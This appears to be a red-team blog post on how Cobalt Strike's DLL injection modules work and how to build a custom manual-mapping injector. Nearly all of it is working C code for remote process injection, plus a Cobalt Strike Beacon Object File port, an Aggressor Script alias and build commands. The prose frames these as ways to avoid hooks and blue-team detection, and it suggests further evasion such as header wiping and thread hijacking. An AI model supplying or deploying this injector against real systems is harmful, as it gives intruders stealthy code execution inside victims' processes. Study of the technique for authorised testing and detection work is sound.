Full code for this project can be found here

Cobalt Strike is a widely used C2 framework created to allow red teams to carry out adversary simulations. It is extremely powerful, with key features such as malleable C2 profiles, which make traffic look more legitimate as it crosses a network (e.g. by customising the user-agent and headers). It also implements a wide array of post-exploitation modules that allow a red teamer to move around a network while remaining relatively OPSEC safe. With the recent addition of Beacon Object Files, it has become possible to implement a custom version of a pre-existing module. There are two modules in particular I'd like to take a look at:

    dllinject                 Inject a Reflective DLL into a process
    dllload                   Load DLL into a process with LoadLibrary()

DLL Load

We'll start with the simpler of the two modules, dllload. This module works by opening a handle to the process we're going to inject into. We then get the address of LoadLibrary in memory via GetProcAddress. Next, memory is allocated in the remote process and the full DLL path is written into the newly allocated buffer. Finally, we create a thread in the remote process which calls LoadLibrary with the DLL path as an argument. In code form it would look something like this:

// Requires <windows.h>, <cstring> and <iostream>
BOOL InjectDll(DWORD procID, const char* dllName) {
    char fullDllName[MAX_PATH];
    LPVOID loadLibrary;
    LPVOID remoteString;

    if (procID == 0) {
        return FALSE;
    }

    // OpenProcess returns NULL on failure, not INVALID_HANDLE_VALUE
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procID);
    if (hProc == NULL) {
        return FALSE;
    }

    GetFullPathNameA(dllName, MAX_PATH, fullDllName, NULL);
    std::cout << "[+] Acquired full DLL path: " << fullDllName << std::endl;

    // Size of the path including its terminating NUL byte
    SIZE_T pathSize = strlen(fullDllName) + 1;

    loadLibrary = (LPVOID)GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
    remoteString = VirtualAllocEx(hProc, NULL, pathSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

    WriteProcessMemory(hProc, remoteString, fullDllName, pathSize, NULL);
    CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)loadLibrary, remoteString, 0, NULL);

    CloseHandle(hProc);
    return TRUE;
}

Some of the caveats of this technique are:

  • DLL has to be dropped to disk.
  • LoadLibrary can be hooked in the remote process. Blocking our injection attempts.
  • The module can be seen in the module list.
  • New thread is created on injection.
  • Even if the module is unlinked from the PEB, NtQueryVirtualMemory can still find the DLL, as the mapping is tracked in the kernel (via the VAD tree referenced from the EPROCESS structure).

That's far too many detection vectors. How does Cobalt Strike solve this?

DLL Inject

Cobalt Strike's DLL inject module solves a lot of the issues mentioned in the previous section. DLL inject, or reflective DLL injection, is essentially a custom implementation of the LoadLibrary WinAPI function. Because we implement LoadLibrary ourselves, it's naturally stealthier than the DLL Load technique. There are a few advantages to doing it this way. Firstly, new modules are not added to the PEB, i.e. they don't show up as loaded modules. Secondly, the loaded DLL does not have to touch disk, which is really useful as we want our payloads to reside mostly in memory, writing to disk only as a last resort. Finally, we bypass any hooks that may be placed on LoadLibrary or LdrLoadDll, which may be used to block our injection attempts.

What does DLL inject do? As I mentioned earlier, Cobalt Strike uses reflective DLL injection, a technique first devised by Stephen Fewer. The idea is to copy a DLL to a remote process, then hand execution to an exported function that implements the following:

  • Parse the PE header.
  • Relocate offsets if required.
  • Resolve any dependencies.
  • Call the DLL entry point (DllMain).
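
The first step in the list above, parsing the PE header, can be sketched in portable C. This is a minimal illustration under stated assumptions, not the loader's actual code: the `pe_summary` type and the `parse_pe_headers` helper are hypothetical names introduced here, and the sketch reads only the DOS header's `e_lfanew` field and the first two fields of the file header.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical summary type for this sketch; not part of the original code. */
typedef struct {
    uint32_t nt_offset;     /* e_lfanew: file offset of the "PE\0\0" signature */
    uint16_t machine;       /* IMAGE_FILE_HEADER.Machine, e.g. 0x8664 for x64 */
    uint16_t section_count; /* IMAGE_FILE_HEADER.NumberOfSections */
} pe_summary;

/* Read little-endian values without relying on alignment or host endianness. */
static uint16_t read_u16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t read_u32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 1 and fills *out if buf looks like a PE file, otherwise returns 0. */
static int parse_pe_headers(const uint8_t *buf, size_t len, pe_summary *out)
{
    assert(buf != NULL && out != NULL);

    /* The DOS header is 0x40 bytes long and starts with the magic "MZ". */
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return 0;

    /* e_lfanew lives at offset 0x3C and points at the NT headers. */
    uint32_t nt = read_u32(buf + 0x3C);

    /* The 4-byte signature plus the 20-byte file header must fit in the buffer. */
    if (nt > len || len - nt < 24)
        return 0;
    if (memcmp(buf + nt, "PE\0\0", 4) != 0)
        return 0;

    out->nt_offset = nt;
    out->machine = read_u16(buf + nt + 4);
    out->section_count = read_u16(buf + nt + 6);
    return 1;
}
```

Calling `parse_pe_headers` on the raw bytes of a DLL gives the NT header offset and section count that the later steps start from. The bounds checks are there because the buffer may be truncated or not a PE file at all.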

This technique is very effective and fairly OPSEC safe. However, the main issue I have with this implementation is that you have to include the reflective loader code in your DLL. In other words, the DLL has to include an exported function that fixes up the IAT (import address table) and applies any relocations that are needed for the PE to run correctly.

Creating an injector

Now that we have an idea of how Cobalt Strike handles DLL injection, we can start looking at creating our own injector based on the reflective DLL injection technique it uses. The goal is for it to work on any DLL we throw at it, without requiring any pre-configuration or access to the original source code.

To create this injector I'm going to use a slightly different technique called manual mapping. It carries out the same steps as reflective DLL injection (handling relocations, dynamically loading dependencies and so on), but does all of this from the injector, so the DLL doesn't have to include any additional code.
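
As a small illustration of the dependency-loading step, the sketch below shows how a 64-bit import thunk is interpreted: the top bit says whether the import is by ordinal or by name. The `import_ref` type and `classify_thunk64` helper are hypothetical names used only for this example. The constant mirrors the value of `IMAGE_ORDINAL_FLAG64` from the Windows headers so that the snippet compiles without them.

```c
#include <assert.h>
#include <stdint.h>

/* Mirrors IMAGE_ORDINAL_FLAG64 from the Windows headers. */
#define ORDINAL_FLAG64 0x8000000000000000ULL

/* Hypothetical result type for this sketch. */
typedef struct {
    int      by_ordinal; /* 1 if the import is by ordinal, 0 if by name */
    uint16_t ordinal;    /* valid when by_ordinal == 1 */
    uint32_t name_rva;   /* RVA of the hint/name entry when by_ordinal == 0 */
} import_ref;

/* Decode one non-zero entry of a PE32+ import lookup table. */
static import_ref classify_thunk64(uint64_t thunk)
{
    import_ref r = {0, 0, 0};

    /* A zero thunk terminates the table and carries no import. */
    assert(thunk != 0);

    if (thunk & ORDINAL_FLAG64) {
        /* By ordinal: the low 16 bits hold the ordinal number. */
        r.by_ordinal = 1;
        r.ordinal = (uint16_t)(thunk & 0xFFFF);
    } else {
        /* By name: the low 31 bits hold the RVA of an IMAGE_IMPORT_BY_NAME. */
        r.name_rva = (uint32_t)(thunk & 0x7FFFFFFF);
    }
    return r;
}
```

A loader would pass either the ordinal or the name found at `name_rva` to GetProcAddress and store the result in the matching import address table slot.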

My implementation uses the ManualMap repo by Zer0Mem0ry as a base. The code I've implemented only works on 64-bit processes. I've tried to comment as much as possible so that all parts of the code are easier to understand.

// Include windows API functions
#include <Windows.h>

// Define api functions so that they can be used with GetProcAddress without the
// compiler complaining
typedef HMODULE(__stdcall* pLoadLibraryA)(LPCSTR);
typedef FARPROC(__stdcall* pGetProcAddress)(HMODULE, LPCSTR);

// Dll main typedef so that we can invoke it properly from the injector
typedef INT(__stdcall* dllmain)(HMODULE, DWORD, LPVOID);

// Structure to be passed to the remote process so it has
// somewhere to start from
struct RemoteData
{
	LPVOID ImageBase;

	PIMAGE_NT_HEADERS NtHeaders;
	PIMAGE_BASE_RELOCATION BaseReloc;
	PIMAGE_IMPORT_DESCRIPTOR ImportDirectory;

	pLoadLibraryA fnLoadLibraryA;
	pGetProcAddress fnGetProcAddress;

};

// Called in the remote process to handle image relocations and imports
DWORD __stdcall LibraryLoader(LPVOID Memory)
{

	RemoteData* remoteParams = (RemoteData*)Memory;

	PIMAGE_BASE_RELOCATION pIBR = remoteParams->BaseReloc;

	DWORD64 delta = (DWORD64)((LPBYTE)remoteParams->ImageBase - remoteParams->NtHeaders->OptionalHeader.ImageBase); // Calculate the delta
	
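	// Iterate over relocation blocks
	while (pIBR->VirtualAddress)
	{
		if (pIBR->SizeOfBlock >= sizeof(IMAGE_BASE_RELOCATION))
		{
			// Each entry is a 16-bit WORD: the top 4 bits hold the type, the low 12 bits the offset
			int count = (pIBR->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);
			PWORD list = (PWORD)(pIBR + 1);

			for (int i = 0; i < count; i++)
			{
				// Only patch 64-bit entries; IMAGE_REL_BASED_ABSOLUTE entries are padding
				if ((list[i] >> 12) == IMAGE_REL_BASED_DIR64)
				{
					PDWORD64 ptr = (PDWORD64)((LPBYTE)remoteParams->ImageBase + (pIBR->VirtualAddress + (list[i] & 0xFFF)));
					*ptr += delta;
				}
			}
		}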

		pIBR = (PIMAGE_BASE_RELOCATION)((LPBYTE)pIBR + pIBR->SizeOfBlock);
	}

	PIMAGE_IMPORT_DESCRIPTOR pIID = remoteParams->ImportDirectory;

	// Resolve DLL imports
	while (pIID->Characteristics)
	{
		PIMAGE_THUNK_DATA OrigFirstThunk = (PIMAGE_THUNK_DATA)((LPBYTE)remoteParams->ImageBase + pIID->OriginalFirstThunk);
		PIMAGE_THUNK_DATA FirstThunk = (PIMAGE_THUNK_DATA)((LPBYTE)remoteParams->ImageBase + pIID->FirstThunk);

		HMODULE hModule = remoteParams->fnLoadLibraryA((LPCSTR)remoteParams->ImageBase + pIID->Name);

		if (!hModule)
			return FALSE;

		while (OrigFirstThunk->u1.AddressOfData)
		{
			if (OrigFirstThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG)
			{
				// Import by ordinal
				DWORD64 Function = (DWORD64)remoteParams->fnGetProcAddress(hModule,
					(LPCSTR)(OrigFirstThunk->u1.Ordinal & 0xFFFF));

				if (!Function)
					return FALSE;

				FirstThunk->u1.Function = Function;
			}
			else
			{
				// Import by name
				PIMAGE_IMPORT_BY_NAME pIBN = (PIMAGE_IMPORT_BY_NAME)((LPBYTE)remoteParams->ImageBase + OrigFirstThunk->u1.AddressOfData);
				DWORD64 Function = (DWORD64)remoteParams->fnGetProcAddress(hModule, (LPCSTR)pIBN->Name);
				if (!Function)
					return FALSE;

				FirstThunk->u1.Function = Function;
			}
			OrigFirstThunk++;
			FirstThunk++;
		}
		pIID++;
	}

	// Finally, cast the entry point address to our dllmain typedef and call it
	if (remoteParams->NtHeaders->OptionalHeader.AddressOfEntryPoint)
	{
		dllmain EntryPoint = (dllmain)((LPBYTE)remoteParams->ImageBase + remoteParams->NtHeaders->OptionalHeader.AddressOfEntryPoint);

		return EntryPoint((HMODULE)remoteParams->ImageBase, DLL_PROCESS_ATTACH, NULL); // Call the entry point
	}
	return TRUE;
}

DWORD __stdcall stub()
{
	return 0;
}

int main()
{
	// Can use argc and argv rather than hard coding
	LPCSTR dll = "<INSERT_DLL_HERE>";
	
	// Get the process ID (FindProcessId is a helper that is not shown in this listing)
	DWORD procId = FindProcessId("<Target_Process>");

	RemoteData remoteParams;
	
	// Load the DLL into memory (LoadFileIntoMem is a helper not shown in this listing).
	// If implementing a beacon object file, we would start here.
	PVOID dllBuffer = LoadFileIntoMem(dll);

	// Find the DOS Header
	PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)dllBuffer;
	// Find the NT Header from the e_lfanew attribute
	PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((LPBYTE)dllBuffer + pDosHeader->e_lfanew);

	// Open the target process; request fewer access rights in an actual operation
	HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procId);

	// Allocate a section of memory the size of the dll
	PVOID pModAddress = VirtualAllocEx(hProc, NULL, pNtHeaders->OptionalHeader.SizeOfImage,
		MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	// Write the headers to the remote process
	WriteProcessMemory(hProc, pModAddress, dllBuffer,
		pNtHeaders->OptionalHeader.SizeOfHeaders, NULL);

	// Copying sections of the dll to the target process
	PIMAGE_SECTION_HEADER pSectHeader = (PIMAGE_SECTION_HEADER)(pNtHeaders + 1);
	for (int i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++)
	{
		WriteProcessMemory(hProc, (PVOID)((LPBYTE)pModAddress + pSectHeader[i].VirtualAddress),
			(PVOID)((LPBYTE)dllBuffer + pSectHeader[i].PointerToRawData), pSectHeader[i].SizeOfRawData, NULL);
	}

	// Allocating memory for the loader code.
	PVOID loaderMem = VirtualAllocEx(hProc, NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	// Assign values to remote struct
	remoteParams.ImageBase = pModAddress;
	remoteParams.NtHeaders = (PIMAGE_NT_HEADERS)((LPBYTE)pModAddress + pDosHeader->e_lfanew);

	remoteParams.BaseReloc = (PIMAGE_BASE_RELOCATION)((LPBYTE)pModAddress
		+ pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
	remoteParams.ImportDirectory = (PIMAGE_IMPORT_DESCRIPTOR)((LPBYTE)pModAddress
		+ pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);

	remoteParams.fnLoadLibraryA = LoadLibraryA;
	remoteParams.fnGetProcAddress = GetProcAddress;

	// Write remote attributes to the process for our loader code to use
	WriteProcessMemory(hProc, loaderMem, &remoteParams, sizeof(RemoteData), NULL);
	WriteProcessMemory(hProc, (PVOID)((RemoteData*)loaderMem + 1), LibraryLoader,
		(DWORD64)stub - (DWORD64)LibraryLoader, NULL);

	// Create a remote thread in the process and start execution at the loader function
	HANDLE hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)((RemoteData*)loaderMem + 1),
		loaderMem, 0, NULL);

	// Wait for the loader to finish
	WaitForSingleObject(hThread, INFINITE);
	
	// Clean up
	VirtualFreeEx(hProc, loaderMem, 0, MEM_RELEASE);
	CloseHandle(hProc);

	return 0;
}
Sample Manual Mapping code

Using this working sample code we can start to create an implementation using cobalt strike's beacon object files.
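
Before moving on, the relocation loop in LibraryLoader deserves a closer look, because the entry layout is easy to get wrong. The sketch below is a hedged, standalone illustration. Each block starts with an 8-byte header (VirtualAddress and SizeOfBlock) followed by 16-bit entries, where the top 4 bits hold the relocation type and the low 12 bits hold an offset from the block's VirtualAddress. The helper names are hypothetical, and the constants mirror the `IMAGE_REL_BASED_*` values from the Windows headers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define RELOC_BLOCK_HEADER_SIZE 8u /* VirtualAddress (4) + SizeOfBlock (4) */
#define REL_BASED_ABSOLUTE      0u /* padding entry, nothing to patch */
#define REL_BASED_HIGHLOW       3u /* 32-bit address fix-up */
#define REL_BASED_DIR64         10u /* 64-bit address fix-up */

/* Number of 16-bit entries that follow a block header. */
static size_t reloc_entry_count(uint32_t size_of_block)
{
    if (size_of_block < RELOC_BLOCK_HEADER_SIZE)
        return 0;
    return (size_of_block - RELOC_BLOCK_HEADER_SIZE) / sizeof(uint16_t);
}

/* Top 4 bits: relocation type. */
static unsigned reloc_type(uint16_t entry)
{
    return entry >> 12;
}

/* Low 12 bits: offset within the 4 KiB page described by the block. */
static unsigned reloc_offset(uint16_t entry)
{
    return entry & 0x0FFFu;
}

/* RVA of the value that a non-padding entry asks the loader to patch. */
static uint32_t reloc_target_rva(uint32_t block_va, uint16_t entry)
{
    assert(reloc_type(entry) != REL_BASED_ABSOLUTE);
    return block_va + reloc_offset(entry);
}
```

For example, a block with a SizeOfBlock of 12 holds two entries, and the entry 0xA123 in a block whose VirtualAddress is 0x1000 describes a 64-bit fix-up at RVA 0x1123.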

Beacon Object Files

Beacon Object Files are compiled from standard C source files and can call WinAPI functions as well as the additional Beacon functions declared in "beacon.h". Let's start by implementing a simple BOF that just prints a string.

#include "beacon.h"

void go(char* buff, int len) 
{
	BeaconPrintf(CALLBACK_OUTPUT, "Working BOF");
}

Then compile it to an object file with the MinGW command that matches the target architecture.

# for 32-bit
i686-w64-mingw32-gcc -c inject.c -o inject.o

# for 64-bit
x86_64-w64-mingw32-gcc -c inject.c -o inject.o
inline-execute hello world

Now that we have a base object file to work from, we can create a wrapper using an Aggressor Script so that we don't have to type out the inline-execute command every time we want to use our injector. I came up with the following alias, which takes a file path and a process ID as arguments and sends the contents of the file to our BOF.

alias mandllinject {
	local('$barch $handle $data $args $dll_handle $file_data');
	
	# figure out the arch of this session
	$barch = barch($1);
	
	# read in the BOF file (this example always loads inject.o, regardless of $barch)
	$handle = openf(script_resource("inject.o"));
	$data = readb($handle, -1);
	closef($handle);

	$dll_handle = openf($2);
	$file_data = readb($dll_handle, -1);
	closef($dll_handle);

	# pack our arguments
	$args = bof_pack($1, "bi", $file_data, $3);
	
	btask($1, "Manual DLL Inject - @tomcarver_");
	
	# execute it.
	beacon_inline_execute($1, $data, "go", $args);
}
mandllinject <path_to_dll> <procId>

Running the command above will result in the "testdll.dll" file being passed to our beacon. I am able to verify it works by printing the first two bytes of the payload in our BOF, which should be "MZ", as all PE files start with the magic bytes "\x4D\x5A".

Output from mandllinject alias

After verifying that the code works, all that remains is reimplementing the code from earlier in beacon form. This just entails converting WinAPI calls into the special format that Cobalt Strike uses; BOF_Helper by @dtmsecurity is really useful here.

Converting the code from earlier to work with Cobalt Strike, I ended up with a minimal version that can migrate a DLL from memory into a remote process. Some things to note: it currently only works in 64-bit processes. To convert between 64 and 32 bit, change the DWORD64s to regular DWORDs (as well as DWORDs to WORDs) in LibraryLoader, and vice versa. Also, there isn't much in terms of error handling; I'll leave implementing those checks as an exercise for the reader.
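
To make the 64-bit versus 32-bit difference concrete, here is a hedged sketch of how the width of a relocation fix-up depends on its type. It operates on a local byte buffer only, and `apply_reloc` is a hypothetical helper rather than part of the BOF. The constants mirror `IMAGE_REL_BASED_HIGHLOW` and `IMAGE_REL_BASED_DIR64` from the Windows headers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define REL_BASED_HIGHLOW 3u  /* 32-bit images: patch a 4-byte address */
#define REL_BASED_DIR64   10u /* 64-bit images: patch an 8-byte address */

/*
 * Add delta to the address stored at image[rva], using the width implied by
 * the relocation type. Returns 1 if a value was patched, 0 if the entry was
 * skipped (unsupported type, or the target would fall outside the buffer).
 */
static int apply_reloc(uint8_t *image, size_t image_size, uint32_t rva,
                       unsigned type, uint64_t delta)
{
    assert(image != NULL);

    if (type == REL_BASED_DIR64) {
        uint64_t value;
        if (rva > image_size || image_size - rva < sizeof value)
            return 0;
        memcpy(&value, image + rva, sizeof value); /* unaligned-safe read */
        value += delta;
        memcpy(image + rva, &value, sizeof value);
        return 1;
    }

    if (type == REL_BASED_HIGHLOW) {
        uint32_t value;
        if (rva > image_size || image_size - rva < sizeof value)
            return 0;
        memcpy(&value, image + rva, sizeof value);
        value += (uint32_t)delta; /* only the low 32 bits apply */
        memcpy(image + rva, &value, sizeof value);
        return 1;
    }

    return 0; /* e.g. padding entries of type 0 */
}
```

The 64-bit LibraryLoader corresponds to the first branch only. A 32-bit port would take the second branch and compute its delta as a 32-bit value.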

#include <windows.h>
#include "beacon.h"

typedef HMODULE(__stdcall* pLoadLibraryA)(LPCSTR);
typedef FARPROC(__stdcall* pGetProcAddress)(HMODULE, LPCSTR);

// Dll main typedef so that we can invoke it properly from the injector
typedef INT(__stdcall* dllmain)(HMODULE, DWORD, LPVOID);

// API imports required by cobalt strike
DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$WriteProcessMemory (HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T*);
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess (DWORD, BOOL, DWORD);
DECLSPEC_IMPORT WINBASEAPI LPVOID WINAPI KERNEL32$VirtualAllocEx (HANDLE, LPVOID, SIZE_T, DWORD, DWORD);
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$CreateRemoteThread (HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
DECLSPEC_IMPORT WINBASEAPI DWORD WINAPI KERNEL32$WaitForSingleObject (HANDLE, DWORD);
DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$VirtualFreeEx (HANDLE, LPVOID, SIZE_T, DWORD);
DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle (HANDLE);

// MinGW was complaining about the way we
// defined the structure previously.
typedef struct
{
	LPVOID ImageBase;

	PIMAGE_NT_HEADERS NtHeaders;
	PIMAGE_BASE_RELOCATION BaseReloc;
	PIMAGE_IMPORT_DESCRIPTOR ImportDirectory;

	pLoadLibraryA fnLoadLibraryA;
	pGetProcAddress fnGetProcAddress;

} RemoteData;

// Called in the remote process to handle image relocations and imports
DWORD __stdcall LibraryLoader(LPVOID Memory)
{
	// Same as before.
}

DWORD __stdcall stub()
{
	return 0;
}

void go(char* argv, int argc) 
{
	PVOID dllBuffer;
    char* sc_ptr;
	int sc_len, procId;
	RemoteData remoteParams;
    datap parser;
	
	BeaconDataParse(&parser, argv, argc);
	// Extract the DLL bytes; BeaconDataExtract also reports the length of the blob
	sc_ptr = BeaconDataExtract(&parser, &sc_len);
	procId = BeaconDataInt(&parser);
	
	BeaconPrintf(CALLBACK_OUTPUT, "DLL Size %d", sc_len);
	BeaconPrintf(CALLBACK_OUTPUT, "Opening handle to process ID: %d", procId);

	dllBuffer = (PVOID)sc_ptr;
	// Get DOS Header
	PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)dllBuffer;
	// Find the NT Header from the e_lfanew attribute
	PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((LPBYTE)dllBuffer + pDosHeader->e_lfanew);
	
	// Open the target process; request fewer access rights in an actual operation
	HANDLE hProc = KERNEL32$OpenProcess(PROCESS_ALL_ACCESS, FALSE, procId);

	// Allocate a section of memory the size of the dll
	PVOID pModAddress = KERNEL32$VirtualAllocEx(hProc, NULL, pNtHeaders->OptionalHeader.SizeOfImage,
		MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	// Write the headers to the remote process
	KERNEL32$WriteProcessMemory(hProc, pModAddress, dllBuffer,
		pNtHeaders->OptionalHeader.SizeOfHeaders, NULL);

	// Copying sections of the dll to the target process
	PIMAGE_SECTION_HEADER pSectHeader = (PIMAGE_SECTION_HEADER)(pNtHeaders + 1);
	for (int i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++)
	{
		KERNEL32$WriteProcessMemory(hProc, (PVOID)((LPBYTE)pModAddress + pSectHeader[i].VirtualAddress),
			(PVOID)((LPBYTE)dllBuffer + pSectHeader[i].PointerToRawData), pSectHeader[i].SizeOfRawData, NULL);
	}

	// Allocating memory for the loader code.
	PVOID loaderMem = KERNEL32$VirtualAllocEx(hProc, NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	// Assign values to remote struct
	remoteParams.ImageBase = pModAddress;
	remoteParams.NtHeaders = (PIMAGE_NT_HEADERS)((LPBYTE)pModAddress + pDosHeader->e_lfanew);

	remoteParams.BaseReloc = (PIMAGE_BASE_RELOCATION)((LPBYTE)pModAddress
		+ pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
	remoteParams.ImportDirectory = (PIMAGE_IMPORT_DESCRIPTOR)((LPBYTE)pModAddress
		+ pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);

	remoteParams.fnLoadLibraryA = LoadLibraryA;
	remoteParams.fnGetProcAddress = GetProcAddress;

	// Write remote attributes to the process for our loader code to use
	KERNEL32$WriteProcessMemory(hProc, loaderMem, &remoteParams, sizeof(RemoteData), NULL);
	KERNEL32$WriteProcessMemory(hProc, (PVOID)((RemoteData*)loaderMem + 1), LibraryLoader,
		(DWORD64)stub - (DWORD64)LibraryLoader, NULL);

	// Create a remote thread in the process and start execution at the loader function
	HANDLE hThread = KERNEL32$CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)((RemoteData*)loaderMem + 1),
		loaderMem, 0, NULL);

	BeaconPrintf(CALLBACK_OUTPUT, "Finished injecting DLL.");

	// Clean up
	KERNEL32$CloseHandle(hThread);
	KERNEL32$CloseHandle(hProc);

	return;
}

Going Further

Because we now have a different injection technique from the one Cobalt Strike usually uses, it becomes more difficult for blue teams to detect. The icing on the cake is that we can add additional features to the injector. Maybe we want to use a technique like urban bishop, where we don't touch WriteProcessMemory and instead opt for a shared block of memory. It's now entirely doable and easy to implement; my C++ port can be found here if you're interested in using it in a beacon. Similarly, we may want to nuke the PE header, as that has been used to detect reflective DLL injection in the past. We could even implement a version of ThreadContinue, where a thread is hijacked in the remote process in order to run our malicious code.

Final Remarks

I hope this blog post has been informative and that you have learnt a bit more about not only how Cobalt Strike implements DLL injection, but also how we can go about creating extra functionality with Beacon Object Files. If you're interested in more content like this, follow me on Twitter @tomcarver_. Again, the full code for this project is available on GitHub here